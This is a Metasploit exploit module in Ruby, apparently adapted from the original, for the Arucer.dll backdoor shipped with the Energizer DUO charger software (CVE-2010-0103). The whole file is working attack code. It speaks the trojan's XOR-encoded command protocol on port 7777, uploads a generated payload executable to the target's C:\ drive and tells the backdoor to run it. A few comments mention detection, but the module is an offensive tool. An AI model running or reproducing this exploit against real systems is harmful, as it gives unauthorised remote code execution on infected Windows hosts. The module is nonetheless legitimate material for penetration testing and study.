##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
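# Delivers a payload through the command channel left open by the
# Arucer.dll backdoor (CVE-2010-0103): the payload executable is written
# to disk with the :write command and then started with the :exec command.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE

  # Single-byte XOR key applied to every byte this module sends (see
  # #trojan_encode). Together with the fixed command identifiers below this
  # is the whole of the on-wire obfuscation, so the encoded traffic on the
  # default port is a stable pattern to look for when building detections.
  XOR_KEY = 0xE5

  # Command identifiers sent to the listener, keyed by the symbolic name used
  # in this module. Only :write, :exec and :nop are used by #exploit; the rest
  # are retained from the original module for reference.
  COMMAND_IDS = {
    exec: '{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}',
    dir: '{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}',
    write: '{98D958FC-D0A2-4f1c-B841-232AB357E7C8}',
    read: '{F6C43E1A-1551-4000-A483-C361969AEC41}',
    nop: '{783EACBF-EF8B-498e-A059-F0B5BD12641E}',
    find: '{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}',
    yes: '{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}',
    runonce: '{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}',
    delete: '{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution',
        'Description' => %q{
          This module will execute an arbitrary payload against
          any system infected with the Arugizer trojan horse. This
          backdoor was shipped with the software package accompanying
          the Energizer DUO USB battery charger.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2010-0103'],
          ['OSVDB', '62782'],
          ['US-CERT-VU', '154421']
        ],
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-03-05',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # The backdoor's listener port; 7777 is the value the original module used.
    register_options(
      [
        Opt::RPORT(7777),
      ]
    )
  end

  # XOR-encodes +str+ with the backdoor's single-byte key. The operation is
  # its own inverse, so the same method decodes.
  #
  # @param str [String] raw bytes to encode
  # @return [String] encoded bytes, same length as +str+
  def trojan_encode(str)
    str.unpack('C*').map { |byte| byte ^ XOR_KEY }.pack('C*')
  end

  # Builds the encoded command frame for +cmd+: a 32-bit little-endian
  # length (identifier plus its terminating NUL) followed by the
  # NUL-terminated identifier.
  #
  # @param cmd [Symbol] one of the keys of COMMAND_IDS
  # @return [String] XOR-encoded command frame
  # @raise [ArgumentError] when +cmd+ is not a known command. The original
  #   fell through with an empty identifier and silently sent a one-byte
  #   frame; failing loudly makes a typo in a caller visible.
  def trojan_command(cmd)
    cid = COMMAND_IDS.fetch(cmd) do
      raise ArgumentError, "unknown trojan command: #{cmd.inspect}"
    end

    trojan_encode([cid.length + 1].pack('V') + cid + "\x00")
  end

  # Sends one length-prefixed field over the open socket: a 32-bit
  # little-endian byte count, then the bytes. Each part is encoded and
  # written separately, as in the original module.
  #
  # @param str [String] field to send; callers append the trailing NUL
  def send_field(str)
    sock.put(trojan_encode([str.length].pack('V')))
    sock.put(trojan_encode(str))
  end

  # Writes +data+ to +path+ on the target via the :write command, then sends
  # :nop and closes the connection.
  def upload_file(path, data)
    connect

    # Write file request
    sock.put(trojan_command(:write))
    send_field(path)
    send_field(data)

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect
  end

  # Starts the file at +path+ on the target via the :exec command, then sends
  # :nop and closes the connection.
  def execute_file(path)
    connect

    # Execute file request
    sock.put(trojan_command(:exec))
    send_field(path)

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    disconnect
  end

  # Uploads the generated payload executable to a random name under C:\ and
  # then asks the backdoor to run it. Both strings carry their terminating NUL
  # so the length prefix sent by #send_field includes it.
  def exploit
    nam = "C:\\#{Rex::Text.rand_text_alphanumeric(12)}.exe\x00"
    exe = generate_payload_exe + "\x00"

    print_status("Trying to upload #{nam}...")
    upload_file(nam, exe)

    print_status("Trying to execute #{nam}...")
    execute_file(nam)
  end
end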
122
123